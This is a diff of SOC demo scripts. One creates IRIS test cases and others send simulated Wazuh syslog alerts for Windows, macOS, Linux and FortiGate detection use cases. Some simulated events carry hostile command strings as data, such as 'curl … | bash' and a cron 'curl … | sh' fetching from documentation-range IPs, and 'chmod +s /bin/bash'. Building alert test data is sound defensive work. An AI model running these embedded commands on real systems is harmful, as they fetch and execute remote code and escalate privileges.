+#!/usr/bin/env bash
2
+set -euo pipefail
3
+
4
+read_env_var() {
5
+  local key="$1"
6
+  local file="$2"
7
+  [[ -f "${file}" ]] || return 1
8
+  sed -n "s/^${key}=//p" "${file}" | head -n1
9
+}
10
+
11
+SOC_ENV_FILE="${SOC_ENV_FILE:-soc-integrator/.env}"
12
+ROOT_ENV_FILE="${ROOT_ENV_FILE:-.env}"
13
+
14
+iris_api_key_from_env="${IRIS_API_KEY:-}"
15
+if [[ -z "${iris_api_key_from_env}" ]]; then
16
+  iris_api_key_from_env="$(read_env_var "IRIS_API_KEY" "${SOC_ENV_FILE}" || true)"
17
+fi
18
+if [[ -z "${iris_api_key_from_env}" ]]; then
19
+  iris_api_key_from_env="$(read_env_var "IRIS_API_KEY" "${ROOT_ENV_FILE}" || true)"
20
+fi
21
+
22
+integrator_url_from_env="${INTEGRATOR_URL:-}"
23
+if [[ -z "${integrator_url_from_env}" ]]; then
24
+  integrator_url_from_env="$(read_env_var "INTEGRATOR_URL" "${SOC_ENV_FILE}" || true)"
25
+fi
26
+if [[ -z "${integrator_url_from_env}" ]]; then
27
+  integrator_url_from_env="http://localhost:8088"
28
+fi
29
+
30
+iris_base_url_from_env="${IRIS_BASE_URL:-}"
31
+if [[ -z "${iris_base_url_from_env}" ]]; then
32
+  iris_base_url_from_env="$(read_env_var "IRIS_BASE_URL" "${SOC_ENV_FILE}" || true)"
33
+fi
34
+if [[ -z "${iris_base_url_from_env}" ]]; then
35
+  iris_base_url_from_env="https://localhost:8443"
36
+fi
37
+
38
+MODE="${MODE:-integrator}"                  # integrator | direct
39
+COUNT="${COUNT:-5}"
40
+PREFIX="${PREFIX:-SOC Demo Incident}"
41
+INTEGRATOR_URL="${integrator_url_from_env}"
42
+IRIS_BASE_URL="${iris_base_url_from_env}"
43
+IRIS_API_KEY="${iris_api_key_from_env}"
44
+IRIS_VERIFY_SSL="${IRIS_VERIFY_SSL:-false}" # false -> use -k
45
+CASE_CUSTOMER="${CASE_CUSTOMER:-1}"
46
+CASE_SOC_ID="${CASE_SOC_ID:-}"
47
+
48
+if [[ ! "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
49
+  echo "error: COUNT must be a positive integer"
50
+  exit 1
51
+fi
52
+
53
+timestamp="$(date +%Y%m%d-%H%M%S)"
54
+
55
+for i in $(seq 1 "${COUNT}"); do
56
+  severity="medium"
57
+  if (( i % 4 == 0 )); then
58
+    severity="critical"
59
+  elif (( i % 3 == 0 )); then
60
+    severity="high"
61
+  elif (( i % 2 == 0 )); then
62
+    severity="low"
63
+  fi
64
+
65
+  title="${PREFIX} #${i} (${timestamp})"
66
+  description="Generated demo IRIS case ${i}/${COUNT} at ${timestamp}"
67
+
68
+  if [[ "${MODE}" == "integrator" ]]; then
69
+    response="$(
70
+      curl -sS -X POST "${INTEGRATOR_URL}/iris/tickets" \
71
+        -H "Content-Type: application/json" \
72
+        -d "{
73
+          \"title\": \"${title}\",
74
+          \"description\": \"${description}\",
75
+          \"case_customer\": ${CASE_CUSTOMER},
76
+          \"case_soc_id\": \"${CASE_SOC_ID}\",
77
+          \"payload\": {}
78
+        }"
79
+    )"
80
+  elif [[ "${MODE}" == "direct" ]]; then
81
+    curl_args=(-sS -X POST "${IRIS_BASE_URL}/api/v2/cases" -H "Content-Type: application/json")
82
+    if [[ "${IRIS_VERIFY_SSL}" == "false" ]]; then
83
+      curl_args+=(-k)
84
+    fi
85
+    if [[ -n "${IRIS_API_KEY}" ]]; then
86
+      curl_args+=(-H "Authorization: Bearer ${IRIS_API_KEY}")
87
+    fi
88
+    response="$(
89
+      curl "${curl_args[@]}" \
90
+        -d "{
91
+          \"case_name\": \"${title}\",
92
+          \"case_description\": \"${description}\",
93
+          \"case_customer\": ${CASE_CUSTOMER},
94
+          \"case_soc_id\": \"${CASE_SOC_ID}\"
95
+        }"
96
+    )"
97
+  else
98
+    echo "error: MODE must be 'integrator' or 'direct'"
99
+    exit 1
100
+  fi
101
+
102
+  RESPONSE="${response}" python3 - <<'PY'
103
+import json
104
+import os
105
+
106
+raw = os.environ.get("RESPONSE", "")
107
+try:
108
+    data = json.loads(raw)
109
+except Exception:
110
+    print(f"raw_response: {raw[:400]}")
111
+    raise SystemExit(0)
112
+
113
+# integrator shape: {"ok": true, "data": {"iris": {...}}}
114
+if isinstance(data, dict) and "data" in data and isinstance(data["data"], dict):
115
+    iris = data["data"].get("iris", {})
116
+    case = iris.get("data", {}) if isinstance(iris, dict) else {}
117
+    if case:
118
+        print(
119
+            f"created case_id={case.get('case_id')} case_uuid={case.get('case_uuid')} "
120
+            f"title={case.get('case_name')}"
121
+        )
122
+    else:
123
+        print(json.dumps(data))
124
+    raise SystemExit(0)
125
+
126
+# direct IRIS shape: {"status":"success","data":{...}}
127
+case = data.get("data", {}) if isinstance(data, dict) else {}
128
+if isinstance(case, dict) and case:
129
+    print(
130
+        f"created case_id={case.get('case_id')} case_uuid={case.get('case_uuid')} "
131
+        f"title={case.get('case_name')}"
132
+    )
133
+else:
134
+    print(json.dumps(data))
135
+PY
136
+done
137
+
138
+echo "done: created ${COUNT} demo cases (mode=${MODE})"

+ 33 - 5
scripts/send-wazuh-cisco-test-events.sh

@@ -4,6 +4,20 @@ set -euo pipefail
4 4
 SCENARIO="${1:-all}"
5 5
 COUNT="${2:-1}"
6 6
 DELAY="${3:-0.3}"
7
+FOREVER="false"
8
+
9
+for arg in "${@:4}"; do
10
+  case "${arg}" in
11
+    --forever)
12
+      FOREVER="true"
13
+      ;;
14
+    *)
15
+      echo "error: unexpected argument '${arg}'"
16
+      echo "usage: scripts/send-wazuh-cisco-test-events.sh [scenario] [count] [delay_seconds] [--forever]"
17
+      exit 1
18
+      ;;
19
+  esac
20
+done
7 21
 
8 22
 WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
9 23
 WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
@@ -19,6 +33,11 @@ if ! [[ "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
19 33
   exit 1
20 34
 fi
21 35
 
36
+if ! [[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
37
+  echo "error: delay must be numeric (example: 0.5)"
38
+  exit 1
39
+fi
40
+
22 41
 emit_syslog() {
23 42
   local msg="$1"
24 43
   local sent="false"
@@ -100,9 +119,18 @@ send_once() {
100 119
   esac
101 120
 }
102 121
 
103
-for ((i=1; i<=COUNT; i++)); do
104
-  send_once
105
-  if [[ "${i}" -lt "${COUNT}" ]]; then
122
+if [[ "${FOREVER}" == "true" ]]; then
123
+  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
124
+  trap 'echo; echo "stopped"; exit 0' INT TERM
125
+  while true; do
126
+    send_once
106 127
     sleep "${DELAY}"
107
-  fi
108
-done
128
+  done
129
+else
130
+  for ((i=1; i<=COUNT; i++)); do
131
+    send_once
132
+    if [[ "${i}" -lt "${COUNT}" ]]; then
133
+      sleep "${DELAY}"
134
+    fi
135
+  done
136
+fi

+ 228 - 0
scripts/send-wazuh-endpoint-agent-test-events.sh

@@ -0,0 +1,228 @@
1
#!/usr/bin/env bash
set -euo pipefail

# Send simulated Wazuh endpoint-agent syslog events for demo/testing.
#
# Usage:
#   scripts/send-wazuh-endpoint-agent-test-events.sh [platform] [scenario] [count] [delay_seconds] [--forever]
#
# platform: windows | mac | linux | all
# scenario: auth | process | persistence | privilege | malware | all

PLATFORM="${1:-all}"
SCENARIO="${2:-all}"
COUNT="1"
DELAY="0.3"
FOREVER="false"
DRY_RUN="${DRY_RUN:-0}"      # DRY_RUN=1 prints events instead of sending them
COUNT_SET="false"
DELAY_SET="false"

WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"

# Simulated endpoint identities (overridable via environment).
WIN_HOST="${WIN_HOST:-win-client-01}"
MAC_HOST="${MAC_HOST:-mac-client-01}"
LINUX_HOST="${LINUX_HOST:-linux-client-01}"
SIM_USER="${SIM_USER:-jane.doe}"

# Drop the (up to two) positional platform/scenario args already consumed
# above. The previous `shift 2 || true` silently shifted NOTHING when only
# one argument was given (bash leaves the positional parameters unchanged
# when n > $#), so that single argument was then mis-parsed below as COUNT.
shift "$(( $# < 2 ? $# : 2 ))"

while (($#)); do
  case "$1" in
    --forever)
      FOREVER="true"
      shift
      ;;
    *)
      # Remaining positionals are, in order: count then delay.
      if [[ "${COUNT_SET}" == "false" ]]; then
        COUNT="$1"
        COUNT_SET="true"
      elif [[ "${DELAY_SET}" == "false" ]]; then
        DELAY="$1"
        DELAY_SET="true"
      else
        echo "error: unexpected argument '$1'"
        echo "usage: scripts/send-wazuh-endpoint-agent-test-events.sh [platform] [scenario] [count] [delay_seconds] [--forever]"
        exit 1
      fi
      shift
      ;;
  esac
done

if ! [[ "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
  echo "error: count must be a positive integer"
  exit 1
fi

if ! [[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
  echo "error: delay must be numeric (example: 0.5)"
  exit 1
fi
55
+
56
# emit_syslog MESSAGE
# Deliver one raw syslog line to ${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}
# over UDP. Honors DRY_RUN=1 (print only, no network). Tries nc first, then
# falls back to bash's /dev/udp pseudo-device.
emit_syslog() {
  local payload="$1"

  # Dry-run mode: show what would be sent and stop.
  if [[ "${DRY_RUN}" == "1" ]]; then
    echo "[DRY_RUN $(date -u +'%Y-%m-%dT%H:%M:%SZ')] ${payload}"
    return 0
  fi

  local delivered="false"

  # Preferred transport: netcat in UDP mode with a 1-second timeout.
  if command -v nc >/dev/null 2>&1; then
    if printf "%s\n" "${payload}" | nc -u -w1 "${WAZUH_SYSLOG_HOST}" "${WAZUH_SYSLOG_PORT}"; then
      delivered="true"
    fi
  fi

  # Fallback transport: bash's built-in /dev/udp redirection.
  if [[ "${delivered}" != "true" ]]; then
    if printf "%s\n" "${payload}" >"/dev/udp/${WAZUH_SYSLOG_HOST}/${WAZUH_SYSLOG_PORT}" 2>/dev/null; then
      delivered="true"
    fi
  fi

  if [[ "${delivered}" != "true" ]]; then
    echo "error: failed to send syslog event to ${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
    return 1
  fi

  echo "[$(date -u +'%Y-%m-%dT%H:%M:%SZ')] sent: ${payload}"
}
84
+
85
# rand_public_ip: random address from the RFC 5737 documentation ranges
# (TEST-NET-2 198.51.100.0/24 or TEST-NET-3 203.0.113.0/24), last octet 10-249.
rand_public_ip() {
  local last_octet=$((RANDOM % 240 + 10))
  case $((RANDOM % 2)) in
    0) echo "198.51.100.${last_octet}" ;;
    *) echo "203.0.113.${last_octet}" ;;
  esac
}

# rand_private_ip: random RFC 1918 10.x.y.z address
# (x: 10-29, y: 1-200, z: 10-249).
rand_private_ip() {
  printf '10.%d.%d.%d\n' $((RANDOM % 20 + 10)) $((RANDOM % 200 + 1)) $((RANDOM % 240 + 10))
}
96
+
97
# Per-platform event senders. All share one formatter so the syslog framing
# (priority, timestamp, host, source/platform tags) stays consistent.

# _agent_event PRIORITY HOST PLATFORM FIELDS
# Emit "<PRIORITY>MMM dd HH:MM:SS HOST soc_mvp_test=true
# source=<PLATFORM>_agent platform=<PLATFORM> FIELDS".
_agent_event() {
  emit_syslog "<$1>$(date '+%b %d %H:%M:%S') $2 soc_mvp_test=true source=${3}_agent platform=$3 $4"
}

# --- Windows (syslog priority 182) ---

send_windows_auth() {
  _agent_event 182 "${WIN_HOST}" windows "event_type=windows_auth_fail severity=medium event_id=4625 account=\"${SIM_USER}\" src_ip=$(rand_public_ip) fail_count=$((RANDOM % 8 + 3))"
}

send_windows_process() {
  _agent_event 182 "${WIN_HOST}" windows "event_type=windows_suspicious_process severity=high event_id=4688 process=\"powershell.exe\" cmdline=\"powershell -enc <base64>\" parent=\"winword.exe\" user=\"${SIM_USER}\""
}

send_windows_persistence() {
  _agent_event 182 "${WIN_HOST}" windows "event_type=windows_persistence_registry severity=high event_id=4657 registry_path=\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Updater\" user=\"${SIM_USER}\""
}

send_windows_privilege() {
  _agent_event 182 "${WIN_HOST}" windows "event_type=windows_privilege_group_add severity=high event_id=4732 account=\"${SIM_USER}\" target_group=\"Administrators\""
}

send_windows_malware() {
  _agent_event 182 "${WIN_HOST}" windows "event_type=windows_malware_detected severity=high event_id=1116 engine=\"Defender\" threat=\"Trojan:Win32/AgentTesla\" path=\"C:\\\\Users\\\\${SIM_USER}\\\\AppData\\\\Local\\\\Temp\\\\invoice.exe\" action=\"quarantine\""
}

# --- macOS (syslog priority 134) ---

send_mac_auth() {
  _agent_event 134 "${MAC_HOST}" mac "event_type=mac_auth_fail severity=medium subsystem=\"com.apple.loginwindow\" user=\"${SIM_USER}\" src_ip=$(rand_public_ip) fail_count=$((RANDOM % 8 + 3))"
}

send_mac_process() {
  _agent_event 134 "${MAC_HOST}" mac "event_type=mac_suspicious_process severity=high process=\"osascript\" cmdline=\"osascript -e do shell script curl ...\" parent=\"Safari\" user=\"${SIM_USER}\""
}

send_mac_persistence() {
  _agent_event 134 "${MAC_HOST}" mac "event_type=mac_launchagent_created severity=high plist=\"/Users/${SIM_USER}/Library/LaunchAgents/com.apple.updater.plist\" user=\"${SIM_USER}\""
}

send_mac_privilege() {
  _agent_event 134 "${MAC_HOST}" mac "event_type=mac_privilege_escalation severity=high action=\"sudo\" user=\"${SIM_USER}\" tty=\"ttys001\" cmd=\"/bin/chmod +s /bin/bash\""
}

send_mac_malware() {
  _agent_event 134 "${MAC_HOST}" mac "event_type=mac_xprotect_detected severity=high signature=\"OSX.Adload\" file=\"/Users/${SIM_USER}/Downloads/installer.pkg\" action=\"blocked\""
}

# --- Linux (syslog priority 133) ---

send_linux_auth() {
  _agent_event 133 "${LINUX_HOST}" linux "event_type=linux_ssh_auth_fail severity=medium process=\"sshd\" user=\"${SIM_USER}\" src_ip=$(rand_public_ip) fail_count=$((RANDOM % 8 + 3))"
}

send_linux_process() {
  _agent_event 133 "${LINUX_HOST}" linux "event_type=linux_suspicious_process severity=high process=\"curl\" cmdline=\"curl http://198.51.100.20/a.sh | bash\" user=\"${SIM_USER}\""
}

send_linux_persistence() {
  _agent_event 133 "${LINUX_HOST}" linux "event_type=linux_cron_persistence severity=high file=\"/etc/cron.d/system-update\" user=\"root\" command=\"*/5 * * * * curl -fsSL http://203.0.113.20/s | sh\""
}

send_linux_privilege() {
  _agent_event 133 "${LINUX_HOST}" linux "event_type=linux_sudo_privilege_escalation severity=high user=\"${SIM_USER}\" command=\"sudo usermod -aG sudo ${SIM_USER}\" src_ip=$(rand_private_ip)"
}

send_linux_malware() {
  _agent_event 133 "${LINUX_HOST}" linux "event_type=linux_malware_detected severity=high scanner=\"clamav\" signature=\"Unix.Trojan.Mirai\" file=\"/tmp/kworkerd\" action=\"removed\""
}
156
+
157
# send_one_platform PLATFORM
# Dispatch the globally-selected SCENARIO for one platform by invoking the
# matching send_<platform>_<scenario> function(s); "all" runs every scenario
# in a fixed auth -> process -> persistence -> privilege -> malware order.
send_one_platform() {
  local platform="$1"
  local picked

  case "${SCENARIO}" in
    auth|process|persistence|privilege|malware)
      picked="${SCENARIO}"
      ;;
    all)
      picked="auth process persistence privilege malware"
      ;;
    *)
      echo "error: unknown scenario '${SCENARIO}'"
      echo "valid: auth | process | persistence | privilege | malware | all"
      exit 1
      ;;
  esac

  # Intentional word-splitting: ${picked} is a space-separated list.
  local s
  for s in ${picked}; do
    "send_${platform}_${s}"
  done
}
189
+
190
# send_once
# Emit one round of events for the selected PLATFORM; "all" fans out to every
# platform in a fixed windows -> mac -> linux order ("macos" is accepted as
# an alias for "mac").
send_once() {
  local targets

  case "${PLATFORM}" in
    windows)   targets="windows" ;;
    mac|macos) targets="mac" ;;
    linux)     targets="linux" ;;
    all)       targets="windows mac linux" ;;
    *)
      echo "error: unknown platform '${PLATFORM}'"
      echo "valid: windows | mac | linux | all"
      exit 1
      ;;
  esac

  # Intentional word-splitting: ${targets} is a space-separated list.
  local t
  for t in ${targets}; do
    send_one_platform "${t}"
  done
}
213
+
214
# Main send loop: either run indefinitely (--forever, stop with Ctrl+C) or
# run COUNT rounds with DELAY seconds between rounds (no trailing sleep after
# the final round).
if [[ "${FOREVER}" == "true" ]]; then
  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
  trap 'echo; echo "stopped"; exit 0' INT TERM
  while :; do
    send_once
    sleep "${DELAY}"
  done
else
  i=1
  while (( i <= COUNT )); do
    send_once
    if (( i < COUNT )); then
      sleep "${DELAY}"
    fi
    i=$(( i + 1 ))
  done
fi

Разница между файлами не показана из-за своего большого размера
+ 217 - 0
scripts/send-wazuh-fortigate-continuous.sh


Разница между файлами не показана из-за своего большого размера
+ 135 - 0
scripts/send-wazuh-fortigate-test-events.sh


+ 329 - 0
scripts/send-wazuh-proposal-required-events.sh

@@ -0,0 +1,329 @@
1
#!/usr/bin/env bash
set -euo pipefail

# Send the proposal-required Wazuh demo events (sections A1-A4) as syslog.
#
# Usage:
#   scripts/send-wazuh-proposal-required-events.sh [selector] [count] [delay_seconds] [--forever]
#
# selector:
#   all | a1 | a2 | a3 | a4 | <usecase_id>
#   example usecase_id: A2-01, A3-05, A4-24

SELECTOR="${1:-all}"
COUNT="${2:-1}"
DELAY="${3:-0.3}"
EVENT_DELAY="${EVENT_DELAY:-0.05}"   # pause between individual events in one round
DRY_RUN="${DRY_RUN:-0}"              # DRY_RUN=1 prints events instead of sending
FOREVER="false"

# Only --forever is accepted after the three positional arguments.
for extra in "${@:4}"; do
  case "${extra}" in
    --forever)
      FOREVER="true"
      ;;
    *)
      echo "error: unexpected argument '${extra}'"
      echo "usage: scripts/send-wazuh-proposal-required-events.sh [selector] [count] [delay_seconds] [--forever]"
      exit 1
      ;;
  esac
done

WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"

# Simulated device / host identities (overridable via environment).
FGT_DEVNAME="${FGT_DEVNAME:-FGT80F-Branch01}"
FGT_DEVID="${FGT_DEVID:-FGT80FTK20000001}"
WIN_HOST="${WIN_HOST:-win-dc01}"
DNS_HOST="${DNS_HOST:-dns-fw-01}"
SIM_VPN_USER="${SIM_VPN_USER:-remote.user}"

# Input validation; regex check runs first so the -ge comparison only ever
# sees a plain integer.
[[ "${COUNT}" =~ ^[0-9]+$ && "${COUNT}" -ge 1 ]] || {
  echo "error: count must be a positive integer"
  exit 1
}

[[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]] || {
  echo "error: delay must be numeric"
  exit 1
}

[[ "${EVENT_DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]] || {
  echo "error: EVENT_DELAY must be numeric"
  exit 1
}
54
+
55
# rand_public_ip: random address from the RFC 5737 documentation ranges
# (TEST-NET-2 198.51.100.0/24 or TEST-NET-3 203.0.113.0/24), last octet 10-249.
rand_public_ip() {
  local last_octet=$((RANDOM % 240 + 10))
  case $((RANDOM % 2)) in
    0) echo "198.51.100.${last_octet}" ;;
    *) echo "203.0.113.${last_octet}" ;;
  esac
}

# rand_private_ip: random RFC 1918 10.x.y.z address
# (x: 10-29, y: 1-200, z: 10-249).
rand_private_ip() {
  printf '10.%d.%d.%d\n' $((RANDOM % 20 + 10)) $((RANDOM % 200 + 1)) $((RANDOM % 240 + 10))
}

# rand_domain: synthetic IoC domain like "ioc-4242.malicious.example"
# (four-digit suffix, 1000-9999).
rand_domain() {
  printf 'ioc-%d.malicious.example\n' $((RANDOM % 9000 + 1000))
}
70
+
71
# emit_syslog MESSAGE
# Deliver one raw syslog line to ${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}
# over UDP. Honors DRY_RUN=1 (print only, no network). Tries nc first, then
# falls back to bash's /dev/udp pseudo-device.
emit_syslog() {
  local payload="$1"

  # Dry-run mode: show what would be sent and stop.
  if [[ "${DRY_RUN}" == "1" ]]; then
    echo "[DRY_RUN $(date -u +'%Y-%m-%dT%H:%M:%SZ')] ${payload}"
    return 0
  fi

  local delivered="false"

  # Preferred transport: netcat in UDP mode with a 1-second timeout.
  if command -v nc >/dev/null 2>&1; then
    if printf "%s\n" "${payload}" | nc -u -w1 "${WAZUH_SYSLOG_HOST}" "${WAZUH_SYSLOG_PORT}"; then
      delivered="true"
    fi
  fi

  # Fallback transport: bash's built-in /dev/udp redirection.
  if [[ "${delivered}" != "true" ]]; then
    if printf "%s\n" "${payload}" >"/dev/udp/${WAZUH_SYSLOG_HOST}/${WAZUH_SYSLOG_PORT}" 2>/dev/null; then
      delivered="true"
    fi
  fi

  if [[ "${delivered}" != "true" ]]; then
    echo "error: failed to send syslog event to ${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
    return 1
  fi

  echo "[$(date -u +'%Y-%m-%dT%H:%M:%SZ')] sent: ${payload}"
}
99
+
100
# selector_matches USECASE_ID SECTION
# True when the global SELECTOR (compared case-insensitively) is "all",
# equals the section (e.g. "a2"), or equals the exact usecase id
# (e.g. "a2-01"). Uses bash ${var,,} lowercasing instead of tr subshells.
selector_matches() {
  local want="${SELECTOR,,}"
  local id="${1,,}"
  local section="${2,,}"

  [[ "${want}" == "all" || "${want}" == "${section}" || "${want}" == "${id}" ]]
}
112
+
113
# emit_fgt_usecase ID SECTION SEVERITY USECASE BODY
# Emit one FortiGate-style usecase event (if SELECTOR matches), then pause
# EVENT_DELAY seconds so downstream collectors see a stable ordering.
emit_fgt_usecase() {
  local uc_id="$1" uc_section="$2" uc_severity="$3" uc_name="$4" uc_body="$5"

  if ! selector_matches "${uc_id}" "${uc_section}"; then
    return 0
  fi

  emit_syslog "<190>date=$(date '+%Y-%m-%d') time=$(date '+%H:%M:%S') devname=\"${FGT_DEVNAME}\" devid=\"${FGT_DEVID}\" eventtime=$(date +%s) vd=\"root\" soc_mvp_test=true source=fortigate section=${uc_section} usecase_id=${uc_id} severity=${uc_severity} usecase=\"${uc_name}\" ${uc_body}"
  sleep "${EVENT_DELAY}"
}

# emit_dns_usecase ID SECTION SEVERITY USECASE BODY
# Same contract as emit_fgt_usecase, but framed as a DNS-host syslog event.
emit_dns_usecase() {
  local uc_id="$1" uc_section="$2" uc_severity="$3" uc_name="$4" uc_body="$5"

  if ! selector_matches "${uc_id}" "${uc_section}"; then
    return 0
  fi

  emit_syslog "<189>$(date '+%b %d %H:%M:%S') ${DNS_HOST} soc_mvp_test=true source=dns section=${uc_section} usecase_id=${uc_id} severity=${uc_severity} usecase=\"${uc_name}\" ${uc_body}"
  sleep "${EVENT_DELAY}"
}

# emit_windows_usecase ID SECTION SEVERITY USECASE BODY
# Same contract as emit_fgt_usecase, but framed as a Windows-host syslog event.
emit_windows_usecase() {
  local uc_id="$1" uc_section="$2" uc_severity="$3" uc_name="$4" uc_body="$5"

  if ! selector_matches "${uc_id}" "${uc_section}"; then
    return 0
  fi

  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} soc_mvp_test=true source=windows section=${uc_section} usecase_id=${uc_id} severity=${uc_severity} usecase=\"${uc_name}\" ${uc_body}"
  sleep "${EVENT_DELAY}"
}
151
+
152
# emit_a1: section A1 — DNS / IoC-domain detection usecases.
emit_a1() {
  local client_ip malicious_domain resolved_ip
  client_ip="$(rand_private_ip)"
  malicious_domain="$(rand_domain)"
  resolved_ip="$(rand_public_ip)"

  emit_dns_usecase "A1-01" "A1" "medium" \
    "DNS Network Traffic Communicate to Malicious Domain" \
    "event_type=ioc_dns_traffic src_ip=${client_ip} query=${malicious_domain} resolved_ip=${resolved_ip} action=blocked"

  emit_dns_usecase "A1-02" "A1" "medium" \
    "DNS Network Traffic Malicious Domain IOCs Detection" \
    "event_type=ioc_domain_match src_ip=${client_ip} ioc_type=domain ioc_value=${malicious_domain} feed=threatintel_main confidence=high action=alert"
}
168
+
169
# emit_a2: section A2 — FortiGate IPS/IDS and firewall-administration usecases.
emit_a2() {
  local attacker_ip internal_ip
  attacker_ip="$(rand_public_ip)"
  internal_ip="$(rand_private_ip)"

  emit_fgt_usecase "A2-01" "A2" "high" "IPS IDS Network Traffic Allowed RDP from Public IPs" "logid=\"0000000013\" type=\"traffic\" subtype=\"forward\" srcip=${attacker_ip} dstip=${internal_ip} dstport=3389 service=\"RDP\" action=\"accept\" policyid=44"
  emit_fgt_usecase "A2-02" "A2" "high" "IPS IDS Firewall Account Admin Password Change" "logid=\"0100044547\" type=\"event\" subtype=\"system\" user=\"admin\" action=\"password-change\" target_account=\"admin\""
  emit_fgt_usecase "A2-03" "A2" "high" "IPS IDS Firewall Account Create Add Admin Account" "logid=\"0100044548\" type=\"event\" subtype=\"system\" user=\"admin\" action=\"create-admin\" target_account=\"secops_admin\""
  emit_fgt_usecase "A2-04" "A2" "high" "IPS IDS Firewall Configure Disabled Email Notification" "logid=\"0100044551\" type=\"event\" subtype=\"system\" action=\"config-change\" config_item=\"alertemail\" config_value=\"disable\""
  emit_fgt_usecase "A2-05" "A2" "low" "IPS IDS Firewall Configure Download Configure FW" "logid=\"0100044552\" type=\"event\" subtype=\"system\" action=\"download-config\" user=\"admin\""
  emit_fgt_usecase "A2-06" "A2" "medium" "IPS IDS IDS Alert Multiple Critical High" "logid=\"0720018432\" type=\"utm\" subtype=\"ips\" action=\"detected\" attack=\"Multiple.Critical.High.Signatures\" severity=\"high\" count=7"
  emit_fgt_usecase "A2-07" "A2" "low" "IPS IDS Network Traffic Port Scanning" "logid=\"0720018433\" type=\"utm\" subtype=\"anomaly\" attack=\"TCP.Port.Scan\" srcip=${attacker_ip} dstip=${internal_ip} action=\"detected\""
  emit_fgt_usecase "A2-08" "A2" "medium" "IPS IDS Network Traffic IOC Detection" "logid=\"0720018434\" type=\"utm\" subtype=\"ips\" ioc_type=ip ioc_value=$(rand_public_ip) action=\"blocked\""
  emit_fgt_usecase "A2-09" "A2" "medium" "IPS IDS Network Traffic Port Scanning from Private IP" "logid=\"0720018435\" type=\"utm\" subtype=\"anomaly\" attack=\"Internal.Port.Scan\" srcip=$(rand_private_ip) dstip=$(rand_private_ip) action=\"detected\""
  emit_fgt_usecase "A2-10" "A2" "medium" "IPS IDS Network Traffic Communicate to Malicious IP" "logid=\"0000000013\" type=\"traffic\" subtype=\"forward\" srcip=$(rand_private_ip) dstip=$(rand_public_ip) threat_label=\"known-c2\" action=\"accept\""
}
205
+
206
# emit_a3: section A3 — FortiGate SSL-VPN authentication usecases.
emit_a3() {
  local vpn_src_ip
  vpn_src_ip="$(rand_public_ip)"

  emit_fgt_usecase "A3-01" "A3" "high" "VPN Authentication Success from Guest Account" "logid=\"0101037131\" type=\"event\" subtype=\"vpn\" action=\"ssl-login-success\" user=\"guest\" srcip=${vpn_src_ip} country=\"TH\""
  emit_fgt_usecase "A3-02" "A3" "high" "VPN Authentication Success from Multiple Country" "logid=\"0101037132\" type=\"event\" subtype=\"vpn\" action=\"ssl-login-success\" user=\"${SIM_VPN_USER}\" srcip=${vpn_src_ip} country=\"US\" previous_country=\"TH\""
  emit_fgt_usecase "A3-03" "A3" "high" "VPN Authentication Brute Force Success" "logid=\"0101037133\" type=\"event\" subtype=\"vpn\" action=\"ssl-login-success\" user=\"${SIM_VPN_USER}\" srcip=${vpn_src_ip} failed_attempts_before_success=18"
  emit_fgt_usecase "A3-04" "A3" "low" "VPN Authentication Multiple Fail Many Accounts from One Source" "logid=\"0101037134\" type=\"event\" subtype=\"vpn\" action=\"ssl-login-fail\" srcip=${vpn_src_ip} failed_accounts=12"
  emit_fgt_usecase "A3-05" "A3" "high" "VPN Authentication Success from Outside Thailand" "logid=\"0101037135\" type=\"event\" subtype=\"vpn\" action=\"ssl-login-success\" user=\"${SIM_VPN_USER}\" srcip=${vpn_src_ip} country=\"US\" expected_country=\"TH\""
}
225
+
226
# emit_a4: section A4 — Windows authentication / account-management usecases
# (24 events: A4-01..A4-24, grouped by severity).
emit_a4() {
  # medium-severity usecases
  emit_windows_usecase "A4-01" "A4" "medium" "Windows Authentication Multiple Fail from Privileged Account" "event_id=4625 account=\"administrator\" src_ip=$(rand_private_ip) fail_count=9"
  emit_windows_usecase "A4-02" "A4" "medium" "Windows Authentication Multiple Fail from Service Account" "event_id=4625 account=\"svc_backup\" src_ip=$(rand_private_ip) fail_count=11"
  emit_windows_usecase "A4-03" "A4" "medium" "Windows AD Enumeration with Malicious Tools" "event_id=4688 process=\"adfind.exe\" user=\"user1\" host=\"${WIN_HOST}\""
  emit_windows_usecase "A4-04" "A4" "medium" "Windows Authentication Fail from Public IPs" "event_id=4625 account=\"user1\" src_ip=$(rand_public_ip) fail_count=4"
  emit_windows_usecase "A4-05" "A4" "medium" "Windows File Share Enumeration to Single Destination" "event_id=5145 account=\"user1\" src_ip=$(rand_private_ip) share=\"\\\\\\\\fileserver\\\\finance\" object_count=87"
  # high-severity usecases
  emit_windows_usecase "A4-06" "A4" "high" "Windows Authentication Success from Public IPs" "event_id=4624 account=\"user2\" src_ip=$(rand_public_ip) logon_type=10"
  emit_windows_usecase "A4-07" "A4" "high" "Windows Authentication Privileged Account Impersonation" "event_id=4624 account=\"administrator\" impersonation=true source_account=\"user2\""
